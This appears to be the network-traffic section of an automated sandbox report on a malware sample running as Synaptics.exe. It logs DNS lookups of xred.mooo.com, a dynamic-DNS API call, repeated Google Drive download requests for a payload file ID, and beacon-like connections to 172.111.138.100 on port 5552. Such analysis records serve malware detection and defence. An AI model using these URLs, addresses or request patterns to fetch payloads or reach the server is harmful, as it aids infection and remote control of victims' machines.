                                                                                                              Dec 30, 2024 11:25:48.381855011 CET49797443192.168.2.8216.58.206.46
                                                                                                              Dec 30, 2024 11:25:48.381948948 CET49798443192.168.2.8172.217.16.193
                                                                                                              Dec 30, 2024 11:25:48.381954908 CET49801443192.168.2.8172.217.16.193
                                                                                                              Dec 30, 2024 11:25:51.657170057 CET498055552192.168.2.8172.111.138.100
                                                                                                              Dec 30, 2024 11:25:51.662084103 CET555249805172.111.138.100192.168.2.8
                                                                                                              Dec 30, 2024 11:25:51.662247896 CET498055552192.168.2.8172.111.138.100
                                                                                                              Dec 30, 2024 11:25:51.662497997 CET498055552192.168.2.8172.111.138.100
                                                                                                              Dec 30, 2024 11:25:51.667330027 CET555249805172.111.138.100192.168.2.8
                                                                                                              Dec 30, 2024 11:25:53.797981024 CET555249805172.111.138.100192.168.2.8
                                                                                                              Dec 30, 2024 11:25:53.798065901 CET498055552192.168.2.8172.111.138.100
                                                                                                              Dec 30, 2024 11:25:53.850929976 CET498055552192.168.2.8172.111.138.100
                                                                                                              Dec 30, 2024 11:25:53.855967045 CET555249805172.111.138.100192.168.2.8
                                                                                                              Dec 30, 2024 11:26:00.690360069 CET498065552192.168.2.8172.111.138.100
                                                                                                              Dec 30, 2024 11:26:00.695188046 CET555249806172.111.138.100192.168.2.8
                                                                                                              Dec 30, 2024 11:26:00.695333958 CET498065552192.168.2.8172.111.138.100
                                                                                                              Dec 30, 2024 11:26:00.695939064 CET498065552192.168.2.8172.111.138.100
                                                                                                              Dec 30, 2024 11:26:00.700671911 CET555249806172.111.138.100192.168.2.8
                                                                                                              Dec 30, 2024 11:26:02.854943991 CET555249806172.111.138.100192.168.2.8
                                                                                                              Dec 30, 2024 11:26:02.855174065 CET498065552192.168.2.8172.111.138.100
                                                                                                              Dec 30, 2024 11:26:02.881859064 CET498065552192.168.2.8172.111.138.100
                                                                                                              Dec 30, 2024 11:26:02.886799097 CET555249806172.111.138.100192.168.2.8
                                                                                                              Dec 30, 2024 11:26:09.766726971 CET498085552192.168.2.8172.111.138.100
                                                                                                              Dec 30, 2024 11:26:09.771677971 CET555249808172.111.138.100192.168.2.8
                                                                                                              Dec 30, 2024 11:26:09.772080898 CET498085552192.168.2.8172.111.138.100
                                                                                                              Dec 30, 2024 11:26:09.772080898 CET498085552192.168.2.8172.111.138.100
                                                                                                              Dec 30, 2024 11:26:09.776890993 CET555249808172.111.138.100192.168.2.8
                                                                                                              Dec 30, 2024 11:26:11.906588078 CET555249808172.111.138.100192.168.2.8
                                                                                                              Dec 30, 2024 11:26:11.906826973 CET498085552192.168.2.8172.111.138.100
                                                                                                              Dec 30, 2024 11:26:11.944044113 CET498085552192.168.2.8172.111.138.100
                                                                                                              Dec 30, 2024 11:26:11.948929071 CET555249808172.111.138.100192.168.2.8
                                                                                                              Dec 30, 2024 11:26:18.829257011 CET498095552192.168.2.8172.111.138.100
                                                                                                              Dec 30, 2024 11:26:18.834299088 CET555249809172.111.138.100192.168.2.8
                                                                                                              Dec 30, 2024 11:26:18.834588051 CET498095552192.168.2.8172.111.138.100
                                                                                                              Dec 30, 2024 11:26:18.834903955 CET498095552192.168.2.8172.111.138.100
                                                                                                              Dec 30, 2024 11:26:18.839776039 CET555249809172.111.138.100192.168.2.8
                                                                                                              Dec 30, 2024 11:26:20.967639923 CET555249809172.111.138.100192.168.2.8
                                                                                                              Dec 30, 2024 11:26:20.967704058 CET498095552192.168.2.8172.111.138.100
                                                                                                              Dec 30, 2024 11:26:21.022594929 CET498095552192.168.2.8172.111.138.100
                                                                                                              Dec 30, 2024 11:26:21.027604103 CET555249809172.111.138.100192.168.2.8
                                                                                                              Dec 30, 2024 11:26:27.907604933 CET498385552192.168.2.8172.111.138.100
                                                                                                              Dec 30, 2024 11:26:27.912463903 CET555249838172.111.138.100192.168.2.8
                                                                                                              Dec 30, 2024 11:26:27.912703991 CET498385552192.168.2.8172.111.138.100
                                                                                                              Dec 30, 2024 11:26:27.913134098 CET498385552192.168.2.8172.111.138.100
                                                                                                              Dec 30, 2024 11:26:27.918023109 CET555249838172.111.138.100192.168.2.8
                                                                                                              Dec 30, 2024 11:26:30.047203064 CET555249838172.111.138.100192.168.2.8
                                                                                                              Dec 30, 2024 11:26:30.047419071 CET498385552192.168.2.8172.111.138.100
                                                                                                              Dec 30, 2024 11:26:30.069552898 CET498385552192.168.2.8172.111.138.100
                                                                                                              Dec 30, 2024 11:26:30.074301004 CET555249838172.111.138.100192.168.2.8
                                                                                                              Dec 30, 2024 11:26:36.938879967 CET499035552192.168.2.8172.111.138.100
                                                                                                              Dec 30, 2024 11:26:36.943973064 CET555249903172.111.138.100192.168.2.8
                                                                                                              Dec 30, 2024 11:26:36.944083929 CET499035552192.168.2.8172.111.138.100
                                                                                                              Dec 30, 2024 11:26:36.944363117 CET499035552192.168.2.8172.111.138.100
                                                                                                              Dec 30, 2024 11:26:36.949156046 CET555249903172.111.138.100192.168.2.8
                                                                                                              Dec 30, 2024 11:26:39.072258949 CET555249903172.111.138.100192.168.2.8
                                                                                                              Dec 30, 2024 11:26:39.072348118 CET499035552192.168.2.8172.111.138.100
                                                                                                              Dec 30, 2024 11:26:39.133898973 CET499035552192.168.2.8172.111.138.100
                                                                                                              Dec 30, 2024 11:26:39.143038034 CET555249903172.111.138.100192.168.2.8
                                                                                                              Dec 30, 2024 11:26:46.009998083 CET499625552192.168.2.8172.111.138.100
                                                                                                              Dec 30, 2024 11:26:46.015335083 CET555249962172.111.138.100192.168.2.8
                                                                                                              Dec 30, 2024 11:26:46.015441895 CET499625552192.168.2.8172.111.138.100
                                                                                                              Dec 30, 2024 11:26:46.015796900 CET499625552192.168.2.8172.111.138.100
                                                                                                              Dec 30, 2024 11:26:46.020641088 CET555249962172.111.138.100192.168.2.8
                                                                                                              Dec 30, 2024 11:26:59.958375931 CET555249962172.111.138.100192.168.2.8
                                                                                                              Dec 30, 2024 11:26:59.958957911 CET499625552192.168.2.8172.111.138.100
                                                                                                              Dec 30, 2024 11:26:59.961194992 CET499625552192.168.2.8172.111.138.100
                                                                                                              Dec 30, 2024 11:26:59.966053963 CET555249962172.111.138.100192.168.2.8
                                                                                                              Dec 30, 2024 11:26:59.985469103 CET500555552192.168.2.8172.111.138.100
                                                                                                              Dec 30, 2024 11:26:59.990384102 CET555250055172.111.138.100192.168.2.8
                                                                                                              Dec 30, 2024 11:26:59.990695000 CET500555552192.168.2.8172.111.138.100
                                                                                                              Dec 30, 2024 11:26:59.990973949 CET500555552192.168.2.8172.111.138.100
                                                                                                              Dec 30, 2024 11:26:59.995743990 CET555250055172.111.138.100192.168.2.8
                                                                                                              Dec 30, 2024 11:27:02.123583078 CET555250055172.111.138.100192.168.2.8
                                                                                                              Dec 30, 2024 11:27:02.123681068 CET500555552192.168.2.8172.111.138.100
                                                                                                              Dec 30, 2024 11:27:02.131759882 CET500555552192.168.2.8172.111.138.100
                                                                                                              Dec 30, 2024 11:27:02.136611938 CET555250055172.111.138.100192.168.2.8
                                                                                                              Dec 30, 2024 11:27:09.017445087 CET500845552192.168.2.8172.111.138.100
                                                                                                              Dec 30, 2024 11:27:09.022790909 CET555250084172.111.138.100192.168.2.8
                                                                                                              Dec 30, 2024 11:27:09.022912025 CET500845552192.168.2.8172.111.138.100
                                                                                                              Dec 30, 2024 11:27:09.023215055 CET500845552192.168.2.8172.111.138.100
                                                                                                              Dec 30, 2024 11:27:09.028021097 CET555250084172.111.138.100192.168.2.8
                                                                                                              Dec 30, 2024 11:27:22.902295113 CET555250084172.111.138.100192.168.2.8
                                                                                                              Dec 30, 2024 11:27:22.902441025 CET500845552192.168.2.8172.111.138.100

                                                                                                              UDP Packets

                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Dec 30, 2024 11:25:20.698101997 CET5425653192.168.2.81.1.1.1
                                                                                                              Dec 30, 2024 11:25:20.704998016 CET53542561.1.1.1192.168.2.8
                                                                                                              Dec 30, 2024 11:25:21.569252014 CET6379353192.168.2.81.1.1.1
                                                                                                              Dec 30, 2024 11:25:21.819281101 CET53637931.1.1.1192.168.2.8
                                                                                                              Dec 30, 2024 11:25:21.872697115 CET5211453192.168.2.81.1.1.1
                                                                                                              Dec 30, 2024 11:25:21.985191107 CET5261353192.168.2.81.1.1.1
                                                                                                              Dec 30, 2024 11:25:21.985778093 CET53521141.1.1.1192.168.2.8
                                                                                                              Dec 30, 2024 11:25:21.991914988 CET53526131.1.1.1192.168.2.8
                                                                                                              Dec 30, 2024 11:25:28.658093929 CET5014553192.168.2.81.1.1.1
                                                                                                              Dec 30, 2024 11:25:28.665427923 CET53501451.1.1.1192.168.2.8
                                                                                                              Dec 30, 2024 11:25:35.471853971 CET6369553192.168.2.81.1.1.1
                                                                                                              Dec 30, 2024 11:25:35.479656935 CET53636951.1.1.1192.168.2.8

                                                                                                              DNS Queries

                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                              Dec 30, 2024 11:25:20.698101997 CET192.168.2.81.1.1.10x679bStandard query (0)docs.google.comA (IP address)IN (0x0001)false
                                                                                                              Dec 30, 2024 11:25:21.569252014 CET192.168.2.81.1.1.10x470eStandard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                              Dec 30, 2024 11:25:21.872697115 CET192.168.2.81.1.1.10x91a4Standard query (0)freedns.afraid.orgA (IP address)IN (0x0001)false
                                                                                                              Dec 30, 2024 11:25:21.985191107 CET192.168.2.81.1.1.10x93f8Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                              Dec 30, 2024 11:25:28.658093929 CET192.168.2.81.1.1.10x4e05Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                              Dec 30, 2024 11:25:35.471853971 CET192.168.2.81.1.1.10xaf1aStandard query (0)xred.mooo.comA (IP address)IN (0x0001)false

                                                                                                              DNS Answers

                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                              Dec 30, 2024 11:25:20.704998016 CET1.1.1.1192.168.2.80x679bNo error (0)docs.google.com216.58.206.46A (IP address)IN (0x0001)false
                                                                                                              Dec 30, 2024 11:25:21.819281101 CET1.1.1.1192.168.2.80x470eName error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                              Dec 30, 2024 11:25:21.985778093 CET1.1.1.1192.168.2.80x91a4No error (0)freedns.afraid.org69.42.215.252A (IP address)IN (0x0001)false
                                                                                                              Dec 30, 2024 11:25:21.991914988 CET1.1.1.1192.168.2.80x93f8No error (0)drive.usercontent.google.com172.217.16.193A (IP address)IN (0x0001)false
                                                                                                              Dec 30, 2024 11:25:28.665427923 CET1.1.1.1192.168.2.80x4e05Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                              Dec 30, 2024 11:25:35.479656935 CET1.1.1.1192.168.2.80xaf1aName error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                              Dec 30, 2024 11:26:23.105809927 CET1.1.1.1192.168.2.80x88a1No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                              Dec 30, 2024 11:26:23.105809927 CET1.1.1.1192.168.2.80x88a1No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false

                                                                                                              HTTP Request Dependency Graph

                                                                                                              • docs.google.com
                                                                                                              • drive.usercontent.google.com
                                                                                                              • freedns.afraid.org

                                                                                                              HTTP Packets

                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              0192.168.2.84971469.42.215.252806892C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Dec 30, 2024 11:25:21.993675947 CET154OUTGET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1
                                                                                                              User-Agent: MyApp
                                                                                                              Host: freedns.afraid.org
                                                                                                              Cache-Control: no-cache
                                                                                                              Dec 30, 2024 11:25:22.585627079 CET243INHTTP/1.1 200 OK
                                                                                                              Server: nginx
                                                                                                              Date: Mon, 30 Dec 2024 10:25:22 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: keep-alive
                                                                                                              Vary: Accept-Encoding
                                                                                                              X-Cache: MISS
                                                                                                              Data Raw: 31 66 0d 0a 45 52 52 4f 52 3a 20 43 6f 75 6c 64 20 6e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 2e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 1fERROR: Could not authenticate.0


                                                                                                              HTTPS Proxied Packets

                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              0192.168.2.849710216.58.206.464436892C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:25:21 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              2024-12-30 10:25:21 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:25:21 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-DoQmBt1SPEL4HYvTjrloLw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              1192.168.2.849709216.58.206.464436892C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:25:21 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              2024-12-30 10:25:21 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:25:21 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-WnlhQ8F_EPL6M7jOf6IDvw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              2192.168.2.849713216.58.206.464436892C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:25:22 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              2024-12-30 10:25:22 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:25:22 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-6UYzJjcsywpD3sPRHcJhug' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              3192.168.2.849717172.217.16.1934436892C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:25:22 UTC186OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              2024-12-30 10:25:23 UTC1602INHTTP/1.1 404 Not Found
                                                                                                              X-GUploader-UploadID: AFiumC5vTJUCokayzFTP24RzbZ2wteZ20PKJV_fGCGsI5ZKibDC2htAkWmYVejsRudU-tovVt7UR7xo
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:25:22 GMT
                                                                                                              P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-DRrxHvSvU9zHAJbbqvNwNw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Length: 1652
                                                                                                              Server: UploadServer
                                                                                                              Set-Cookie: NID=520=VL_GHZV1e_y-7-YB2QhgR7m41cVMxQehDrS9YBmiQePvr4mGlbgJWI4frSdZlJpHQfJBXPaJRMtMOz-UlrnyXePV6GErcwoBgK_mJp59isaoCyA6TPNmmXhLo_HbqvVx5bRNbysM9xEJdnROQz30aVMRuLtW1PCVTQponmnCmpzk3I1sm9gCaXPs; expires=Tue, 01-Jul-2025 10:25:22 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                              Connection: close
                                                                                                              2024-12-30 10:25:23 UTC1602INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 66 58 37 39 4a 4e 38 6d 33 64 5a 4c 39 62 41 39 57 75 58 7a 77 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="fX79JN8m3dZL9bA9WuXzwA">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                                              2024-12-30 10:25:23 UTC50INData Raw: 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                              Data Ascii: is server. <ins>Thats all we know.</ins></main>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              4192.168.2.849715216.58.206.464436892C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:25:22 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              2024-12-30 10:25:22 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:25:22 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-TkGgOMQFTBl4dfmJaavWWg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              5192.168.2.849716172.217.16.1934436892C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:25:22 UTC186OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              2024-12-30 10:25:23 UTC1602INHTTP/1.1 404 Not Found
                                                                                                              X-GUploader-UploadID: AFiumC4cf_z3n1BDw5Qh2EQBJ6xGeU9lY2ZnDnd9NoVOrZ2ifvRAgR3vDZ3FmsLVjttN80L2fwCH26I
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:25:23 GMT
                                                                                                              P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-TozIE_lRoF7EJIy03p7EsQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Content-Length: 1652
                                                                                                              Server: UploadServer
                                                                                                              Set-Cookie: NID=520=Qd4VV-n1Yf_ROsUrgdKPuhVdJtms881kuw5-NEclGzUMI-pzv_r7t2oeNy-J9FSKFzrC8RsZb1jmpZAtwdutAPAfwkkSqRjkQFouA9iiTjkzbMvRRD3RPGPIjJYkuZSKDMDHOQm86-lM5ResjXUPxi-6QIAowC9RRf915vNdpP-y3I2vWdY5l_w8; expires=Tue, 01-Jul-2025 10:25:22 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                              Connection: close
